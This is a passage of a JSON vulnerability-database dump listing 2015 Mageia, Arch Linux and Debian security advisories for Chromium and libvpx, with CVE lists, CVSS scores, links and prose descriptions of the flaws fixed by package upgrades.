"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1249", "CVE-2015-3333"], "modified": "2015-04-23T21:14:25", "id": "MGASA-2015-0164", "href": "https://advisories.mageia.org/MGASA-2015-0164.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Chromium-browser 42.0.2311.135 fixes security issues: a use-after-free in DOM (CVE-2015-1243), and various fixes from internal audits, fuzzing and other initiatives (CVE-2015-1250). \n", "cvss3": {}, "published": "2015-05-03T00:19:16", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243", "CVE-2015-1250"], "modified": "2015-05-03T00:19:16", "id": "MGASA-2015-0182", "href": "https://advisories.mageia.org/MGASA-2015-0182.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Updated chromium-browser-stable packages fix security vulnerabilities: Google Chrome before 41.0.2272.118 does not properly handle the interaction of IPC, the Gamepad API, and Google V8, which allows remote attackers to execute arbitrary code via unspecified vectors (CVE-2015-1233). Race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc in Google Chrome before 41.0.2272.118 allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact by manipulating OpenGL ES commands (CVE-2015-1234). \n", "cvss3": {}, "published": "2015-04-09T22:44:14", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2015-04-09T22:44:14", "id": "MGASA-2015-0141", "href": "https://advisories.mageia.org/MGASA-2015-0141.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "libvpx before 1.4.0 allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data (CVE-2015-1258) \n", "cvss3": {}, "published": "2015-07-01T12:40:22", "type": "mageia", "title": "Updated libvpx package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-07-01T12:40:22", "id": "MGASA-2015-0249", "href": "https://advisories.mageia.org/MGASA-2015-0249.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:47", "description": "- CVE-2015-1251 (arbitrary code execution)\n\nUse-after-free vulnerability in the SpeechRecognitionClient\nimplementation in the Speech subsystem allows remote attackers to\nexecute arbitrary code via a crafted document.\n\n- CVE-2015-1252 (sandbox protection bypass)\n\nIt has been discovered that common/partial_circular_buffer.cc does not\nproperly handle wraps, which allows remote attackers to bypass a sandbox\nprotection mechanism or cause a denial of service (out-of-bounds write)\nvia vectors that trigger a write operation with a large amount of data,\nrelated to the PartialCircularBuffer::Write and\nPartialCircularBuffer::DoWrite functions.\n\n- CVE-2015-1253 (same origin policy bypass)\n\nIt has been discovered that core/html/parser/HTMLConstructionSite.cpp in\nthe DOM implementation in Blink allows remote attackers to bypass the\nSame Origin Policy via crafted JavaScript code that appends a child to a\nSCRIPT element, related to the insert and executeReparentTask functions.\n\n- CVE-2015-1254 (same origin policy bypass)\n\nIt has been discovered that core/dom/Document.cpp in Blink enables the\ninheritance of the designMode attribute, which allows remote attackers\nto bypass the Same Origin Policy by leveraging the availability of editing.\n\n- CVE-2015-1255 (denial of service)\n\nUse-after-free vulnerability in\ncontent/renderer/media/webaudio_capturer_source.cc in the WebAudio\nimplementation allows remote attackers to cause a denial of service\n(heap memory corruption) or possibly have unspecified other impact by\nleveraging improper handling of a stop action for an audio track.\n\n- CVE-2015-1256 (denial of service)\n\nUse-after-free vulnerability in the SVG implementation in Blink allows\nremote attackers to cause a denial of service or possibly have\nunspecified other impact via a crafted document that leverages improper\nhandling of a shadow tree for a use element.\n\n- CVE-2015-1257 (denial of service)\n\nIt has been discovered that platform/graphics/filters/FEColorMatrix.cpp\nin the SVG implementation in Blink does not properly handle an\ninsufficient number of values in an feColorMatrix filter, which allows\nremote attackers to cause a denial of service (container overflow) or\npossibly have unspecified other impact via a crafted document.\n\n- CVE-2015-1258 (denial of service)\n\nGoogle Chrome before 43.0.2357.65 relies on libvpx code that was not\nbuilt with an appropriate --size-limit value, which allows remote\nattackers to trigger a negative value for a size field, and consequently\ncause a denial of service or possibly have unspecified other impact, via\na crafted frame size in VP9 video data.\n\n- CVE-2015-1259 (denial of service)\n\nPDFium does not properly initialize memory, which allows remote\nattackers to cause a denial of service or possibly have unspecified\nother impact via unknown vectors.\n\n- CVE-2015-1260 (denial of service)\n\nMultiple use-after-free vulnerabilities in\ncontent/renderer/media/user_media_client_impl.cc in the WebRTC\nimplementation allow remote attackers to cause a denial of service or\npossibly have unspecified other impact via crafted JavaScript code that\nexecutes upon completion of a getUserMedia request.\n\n- CVE-2015-1263 (man-in-the-middle)\n\nThe Spellcheck API implementation does not use an HTTPS session for\ndownloading a Hunspell dictionary, which allows man-in-the-middle\nattackers to deliver incorrect spelling suggestions or possibly have\nunspecified other impact via a crafted file.\n\n- CVE-2015-1264 (cross side scripting)\n\nCross-site scripting (XSS) vulnerability allows user-assisted remote\nattackers to inject arbitrary web script or HTML via crafted data that\nis improperly handled by the Bookmarks feature.\n\n- CVE-2015-1265 (denial of service)\n\nMultiple unspecified vulnerabilities in Google Chrome before\n43.0.2357.65 allow attackers to cause a denial of service or possibly\nhave other impact via unknown vectors.", "edition": 2, "cvss3": {}, "published": "2015-05-21T00:00:00", "type": "archlinux", "title": "chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2015-05-21T00:00:00", "id": "ASA-201505-14", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-May/000335.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:37", "description": "- CVE-2015-1235 (cross-origin bypass)\n\nA vulnerability was discovered that allows cross-origin-bypass in the\nHTML parser.\n\n- CVE-2015-1236 (cross-origin bypass)\n\nA vulnerability was discovered that allows cross-origin-bypass in the\nrendering engine Blink.\n\n- CVE-2015-1237 (arbitrary code execution)\n\nAn use-after-free flaw was discovered in IPC that may lead to arbitrary\ncode execution and denial of service.\n\n- CVE-2015-1238 (arbitrary code execution)\n\nAn out-of-bounds write flaw was discovered in Skia that may lead to\narbitrary code execution and denial of service.\n\n- CVE-2015-1240 (denial of service)\n\nAn out-of-bounds read flaw was discovered in WebGL that may lead to\ninformation disclosure and denial of service.\n\n- CVE-2015-1241 (tap-jacking)\n\nA tap-jacking flaw was discovered that allows the hijacking of tabs to\nshow arbitrary content.\n\n- CVE-2015-1242 (arbitrary code execution)\n\nA Type confusion flaw was discovered in V8 that may lead to arbitrary\ncode execution and denial of service.\n\n- CVE-2015-1244 (security policy bypass)\n\nA security policy flaw was discovered that allowes HSTS bypass in\nWebSockets that may lead to downgrade attacks and cookie hijacking.\n\n- CVE-2015-1245 (arbitrary code execution)\n\nAn use-after-free flaw was discovered in PDFium that may lead to\narbitrary code execution and denial of service.\n\n- CVE-2015-1246 (denial of service)\n\nAn out-of-bounds read flaw was discovered in the rendering engine Blink\nthat may leads to information disclosure and denial of service.\n\n- CVE-2015-1247 (unspecified)\n\nA scheme issues flaw was discovered in OpenSearch that is leading to\nunspecified issues.\n\n- CVE-2015-1248 (filter bypass)\n\nA flaw was discovered that is leading to SafeBrowsing filter bypass.\n\n- CVE-2015-1249 (various)\n\nVarious vulnerabilities were discovered by internal audits, fuzzing and\nother initiatives.", "edition": 2, "cvss3": {}, "published": "2015-04-18T00:00:00", "type": "archlinux", "title": "chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1247", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2015-04-18T00:00:00", "id": "ASA-201504-19", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-April/000298.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:48", "description": "- CVE-2015-1243 (use-after-free):\n\nUse-after-free in DOM. Credit to Saif El-Sherei.\n\n- CVE-2015-1250:\n\nVarious fixes from internal audits, fuzzing and other initiatives.", "edition": 2, "cvss3": {}, "published": "2015-04-29T00:00:00", "type": "archlinux", "title": "chromium: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1250", "CVE-2015-1243"], "modified": "2015-04-29T00:00:00", "id": "ASA-201504-30", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-April/000311.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:42", "description": "- CVE-2015-1233 (remote code execution):\n\nA combination of V8, Gamepad and IPC bugs can lead to remote code\nexecution outside of the sandbox.\n\n- CVE-2015-1234 (buffer overflow):\n\nBuffer overflow via a race condition in GPU.", "edition": 2, "cvss3": {}, "published": "2015-04-02T00:00:00", "type": "archlinux", "title": "chromium: remote code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234"], "modified": "2015-04-02T00:00:00", "id": "ASA-201504-2", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-April/000269.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2021-06-08T18:51:19", "description": "No description provided", "edition": 2, "cvss3": {}, "published": "2015-05-25T00:00:00", "title": "Google Chrome / Chromium multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1247", "CVE-2015-1257", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1250", "CVE-2015-1253", "CVE-2015-3336", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1243", "CVE-2015-1252", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1256", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1261", "CVE-2015-1237", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1238", "CVE-2015-1264", "CVE-2015-1249"], "modified": "2015-05-25T00:00:00", "id": "SECURITYVULNS:VULN:14435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14435", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:59", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3267-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nMay 22, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : chromium-browser\r\nCVE ID : CVE-2015-1251 CVE-2015-1252 CVE-2015-1253 CVE-2015-1254\r\n CVE-2015-1255 CVE-2015-1256 CVE-2015-1257 CVE-2015-1258\r\n CVE-2015-1259 CVE-2015-1260 CVE-2015-1261 CVE-2015-1262\r\n CVE-2015-1263 CVE-2015-1264 CVE-2015-1265\r\n\r\nSeveral vulnerabilities were discovered in the chromium web browser.\r\n\r\nCVE-2015-1251\r\n\r\n SkyLined discovered a use-after-free issue in speech recognition.\r\n\r\nCVE-2015-1252\r\n\r\n An out-of-bounds write issue was discovered that could be used to\r\n escape from the sandbox.\r\n\r\nCVE-2015-1253\r\n\r\n A cross-origin bypass issue was discovered in the DOM parser.\r\n\r\nCVE-2015-1254\r\n\r\n A cross-origin bypass issue was discovered in the DOM editing feature.\r\n\r\nCVE-2015-1255\r\n\r\n Khalil Zhani discovered a use-after-free issue in WebAudio.\r\n\r\nCVE-2015-1256\r\n\r\n Atte Kettunen discovered a use-after-free issue in the SVG\r\n implementation.\r\n\r\nCVE-2015-1257\r\n\r\n miaubiz discovered an overflow issue in the SVG implementation.\r\n\r\nCVE-2015-1258\r\n\r\n cloudfuzzer discovered an invalid size parameter used in the\r\n libvpx library.\r\n\r\nCVE-2015-1259\r\n\r\n Atte Kettunen discovered an uninitialized memory issue in the\r\n pdfium library.\r\n\r\nCVE-2015-1260\r\n\r\n Khalil Zhani discovered multiple use-after-free issues in chromium's\r\n interface to the WebRTC library.\r\n\r\nCVE-2015-1261\r\n\r\n Juho Nurminen discovered a URL bar spoofing issue.\r\n\r\nCVE-2015-1262\r\n\r\n miaubiz discovered the use of an uninitialized class member in\r\n font handling.\r\n\r\nCVE-2015-1263\r\n\r\n Mike Ruddy discovered that downloading the spellcheck dictionary\r\n was not done over HTTPS.\r\n\r\nCVE-2015-1264\r\n\r\n K0r3Ph1L discovered a cross-site scripting issue that could be\r\n triggered by bookmarking a site.\r\n\r\nCVE-2015-1265\r\n\r\n The chrome 43 development team found and fixed various issues\r\n during internal auditing. Also multiple issues were fixed in\r\n the libv8 library, version 4.3.61.21.\r\n\r\nFor the stable distribution (jessie), these problems have been fixed in\r\nversion 43.0.2357.65-1~deb8u1.\r\n\r\nFor the testing distribution (stretch), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion 43.0.2357.65-1.\r\n\r\nWe recommend that you upgrade your chromium-browser packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQQcBAEBCgAGBQJVXrgRAAoJELjWss0C1vRzS5Mf/iSPN/47Wt02hBpAGEMEjirv\r\n4Ee3gJ/Sb/z8EtE7GsZOxci1AsJQYZusm5T6rcwl3Bu3Rnsjj7swZg7cMJBb73+L\r\nhfwl8xY47cjudXFc/V2wJWghjBozIrsaINSVgpEA6AiGl/5S4f941Hgz/Nik8sfg\r\n0r9hH2jU5o3BfYKViAZhjkOjxmXTlO9zPeFD4bA/FCo0YNyN9dIIJYbeBdvG+z5H\r\npOCs3L6QnDyVqu/Zcpi7BtqilDvseV9QGagqg0WpbYimnqvjeeWQAlsKE9+NhwDY\r\nDQ+NufPSPpL3hu+xxPm1kLLndiKRGb5S253Rl+8kWgeKa+UgvdWKePdtQYaidjSK\r\nuVF+8s5en36D0Mr/OOC3a0ZImMsinky+6mg4AjWuZwo+AirZ+DQVTkxMRS9T6l9k\r\nFR3h//VYnqBihbuYrJnRunFjo1RFzLM2P7NiMBAJOhAuVAK4OSpN0pWb/KJN23Ch\r\nQ1C9vdq413VCtgsUuMYc2pqoc/XDBK5CNjtgtm+e9ZdPOKg7A7POuvw7QIv+g3me\r\niRmkc1evjwa9/nkFzgF7HpcoHv25YdrktsF5IfVOXEZL+AkIhViIDe/rIkuxDvz1\r\nuGQFLh+NRWnAeXM89NNrFJ7wmpJoG/PbNWZ44HYa0nQoVz/ygaw827U88FxgoZsD\r\nPVvRVC9cV2S2OpOU1gMg8O5mbQi/g2HQVOEdM/rjoot8W2/K7zfmYVFghFAoNBp5\r\nkAfj3j9c3yHKZ18wFqF+yvcmWBBWGIQvd62s23hKVb7PW09ShArvYp+U7bMwcVfB\r\nV5q9hboqgGVjcyd32BIT1ZW3zSyZ9Jaamw3nLVc2ro8jlnb3UqOK2Kkzb87tBfWU\r\n/ga1nLgy6bg9H3au21/6f+ReP2X96Y4KA2sb3gqhI2FVtJ864anbJM4KcOR3nsV6\r\nm1QqfkksTx8EUlca/k65zDHt7bveQValM437V/OspnqSMt/dquDKJxiRY9Kb/wWZ\r\nAo3QzrLb349xEvxq1vqz1DEiZ2a+w9xA9FPaBXXMinX+93kK5ZJZbIlcn0FQbMgx\r\n7MIWSBI0EutMfoMhexB+7BEdVBRvr0QppxMFJYlJwl+o5nY7aANtboEoU/tqOiaO\r\n/+gQL8evd5Fh6IaC1WMWwXcpypPqaDWzXF1ExkGRpwWO6Dm67k97k79r1ntzVs7o\r\nuDz+/V0cKTm2mL0FxK7+DEyxsxb3SgKD6Fymd3tiknD/hXOsKZkoCKMh5XLzWWBP\r\nPU0DRS/WysA+bGIvqR29GWHADQUvj1A6DjkMIinkitGdaOysn8RlENFZX39XQ94r\r\nEjpXvjyw9rkRZtwMeGDTcUJxoeWNCyRBjJMcEuSeCKmOratYaOMgVpvQeGR4Xno=\r\n=GyQo\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-25T00:00:00", "title": "[SECURITY] [DSA 3267-1] chromium-browser security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-1261", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2015-05-25T00:00:00", "id": "SECURITYVULNS:DOC:32136", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32136", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:58", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3238-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nApril 26, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : chromium-browser\r\nCVE ID : CVE-2015-1235 CVE-2015-1236 CVE-2015-1237 CVE-2015-1238\r\n CVE-2015-1240 CVE-2015-1241 CVE-2015-1242 CVE-2015-1244\r\n CVE-2015-1245 CVE-2015-1246 CVE-2015-1247 CVE-2015-1248\r\n CVE-2015-1249 CVE-2015-3333 CVE-2015-3334 CVE-2015-3336\r\n\r\nSeveral vulnerabilities were discovered in the chromium web browser.\r\n\r\nCVE-2015-1235\r\n\r\n A Same Origin Policy bypass issue was discovered in the HTML parser.\r\n\r\nCVE-2015-1236\r\n\r\n Amitay Dobo discovered a Same Origin Policy bypass in the Web Audio API.\r\n\r\nCVE-2015-1237\r\n\r\n Khalil Zhani discovered a use-after-free issue in IPC.\r\n\r\nCVE-2015-1238\r\n\r\n cloudfuzzer discovered an out-of-bounds write in the skia library.\r\n\r\nCVE-2015-1240\r\n\r\n w3bd3vil discovered an out-of-bounds read in the WebGL implementation.\r\n\r\nCVE-2015-1241\r\n\r\n Phillip Moon and Matt Weston discovered a way to trigger local user\r\n interface actions remotely via a crafted website.\r\n\r\nCVE-2015-1242\r\n\r\n A type confusion issue was discovered in the v8 javascript library.\r\n\r\nCVE-2015-1244\r\n\r\n Mike Ruddy discovered a way to bypass the HTTP Strict Transport Security\r\n policy.\r\n\r\nCVE-2015-1245\r\n\r\n Khalil Zhani discovered a use-after-free issue in the pdfium library.\r\n\r\nCVE-2015-1246\r\n\r\n Atte Kettunen discovered an out-of-bounds read issue in webkit/blink.\r\n\r\nCVE-2015-1247\r\n\r\n Jann Horn discovered that "file:" URLs in OpenSearch documents were not\r\n sanitized, which could allow local files to be read remotely when using\r\n the OpenSearch feature from a crafted website.\r\n\r\nCVE-2015-1248\r\n\r\n Vittorio Gambaletta discovered a way to bypass the SafeBrowsing feature,\r\n which could allow the remote execution of a downloaded executable file.\r\n\r\nCVE-2015-1249\r\n\r\n The chrome 41 development team found various issues from internal\r\n fuzzing, audits, and other studies.\r\n\r\nCVE-2015-3333\r\n\r\n Multiple issues were discovered and fixed in v8 4.2.7.14.\r\n\r\nCVE-2015-3334\r\n\r\n It was discovered that remote websites could capture video data from\r\n attached web cameras without permission.\r\n\r\nCVE-2015-3336\r\n\r\n It was discovered that remote websites could cause user interface\r\n disruptions like window fullscreening and mouse pointer locking.\r\n\r\nFor the stable distribution (jessie), these problems have been fixed in\r\nversion 42.0.2311.90-1~deb8u1.\r\n\r\nFor the testing (stretch) and unstable (sid) distributions, these problems\r\nhave been fixed in version 42.0.2311.90-1.\r\n\r\nWe recommend that you upgrade your chromium-browser packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQQcBAEBCgAGBQJVPaCNAAoJELjWss0C1vRzg+sf/iimJ1F9r0xfcyisL5j8I6Bh\r\nOjrlAOS6tngtr8Mq7RUR4hh5Dusm6gzGswuftgZ3RtiYnBcCBIpE7QEaSRJS9lDW\r\n6N31qxEC7F9fs7tccaoqkRnEbYTxCNRwp1Y6DsNxj5zzFzvMpJf9zvpI+vBwEUK5\r\ncEqZ0X57v0VjW/OEpAuSY5KFodvFvOLteTpi50cMzvBOo/0JWcepXpt5mvbvYowu\r\neA2dQDhlcwlpKWS8Fobc7T2JkpA0oobG3RmzOGCuX2mPnXEndNBoAE35vNqRV5Fs\r\n70k1Y8b9Z3P4l0vnaGcQXnz9pvBsA1chm+vIJ12VTUh2ZVFTxvyCupDOwsryEeNM\r\npgPQqi8I3UOzP2jyuBm+/a5ADtCzTuw+fCFXpkETul6jlAPFzFth+KTHZtOX6cXi\r\nD2pUGYlNTLRoayRSl962ikGuje556Hdhj9jnOzyQvDOKvdt/RykNM/S0aSBHqub/\r\nv1+5M4PKgWVmOpj00f2uQqhLPw1bUC8LVLaWzusNWY/Jf1ljiyZtjD+/+fn2kW6e\r\nJjXSAqkbfSBz1xu9OSsUDuFj5RnB/NEYIxtTp8dr2xUKVVaWHoDX17mbZ6V4SpIp\r\nbI21vmHXGxzxvHlkv8l/7x/Mmyoec0N/gYxQBHVsmBmXCF62ombK0NmAtShdNekr\r\n0lVKpWCOgKabUvW8nvfFrZjb8YVXETLvAAKkgW1bQNEgNT2bIs0AyoF06VJ+lF4j\r\nWm+6tKLsoJoVAQ835paEZbw/4c39ABZM25ZIquo0srZ+WeoFBsnLZ78hOvsZUrLl\r\n1scj2tIwJXI1aEmMkqCsjF8bizDpzjOiQsxNL7MteIsVi+BCRhqatXOqTuKjkgZT\r\nQaMKOtbS/tbp2qq+uL7rFbmaPArV6YtEBghWjW8KfgoS7/n8Q6XmMdhzPA3sYqMp\r\n14U+KqbvcAvjujiJzT0wfo7rfkdcdPmhdWEGILTmxYkIg38IvOYv3bLJKFhRSUK7\r\nB1+RIqXOHGxpqY2vyZQxgJTzHZ8dwjSDDtceuSaKbZhxi+pl4RlVQpYbzEDW2IEo\r\nBJDYNHjqm0yyeY9n90O6y0lwpz78mr6+SxDR+3qaUsGyrt6LGI2yNGTsULjc7sXu\r\nI1Bcbel+NtR/xmTBBz9Czueg4jD5ik+CB2sNi90qgQlZhlbcSlN03fFQ6eCpYSH5\r\nEThWT5rAiscpZHGgXfVabaAv+w1OLi0ljK6A08sYyAz0CMGHz24VlxJtXZBfuu6C\r\nY2C4eDZ/M96wtWz2d4p6sm62spKhZoRHD0JjKlGBLeloeqlTagcAw08zf964ozPI\r\nwYoeI52SYPjal9YikqPLlzYiJDkAi+ejxEobZ0dGSHKuohqVIIAygOJCbq5ouoY=\r\n=D5o5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-05-05T00:00:00", "title": "[SECURITY] [DSA 3238-1] chromium-browser security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1247", "CVE-2015-3334", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-3336", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-3333", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1249"], "modified": "2015-05-05T00:00:00", "id": "SECURITYVULNS:DOC:31999", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31999", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:58", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3242-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nApril 30, 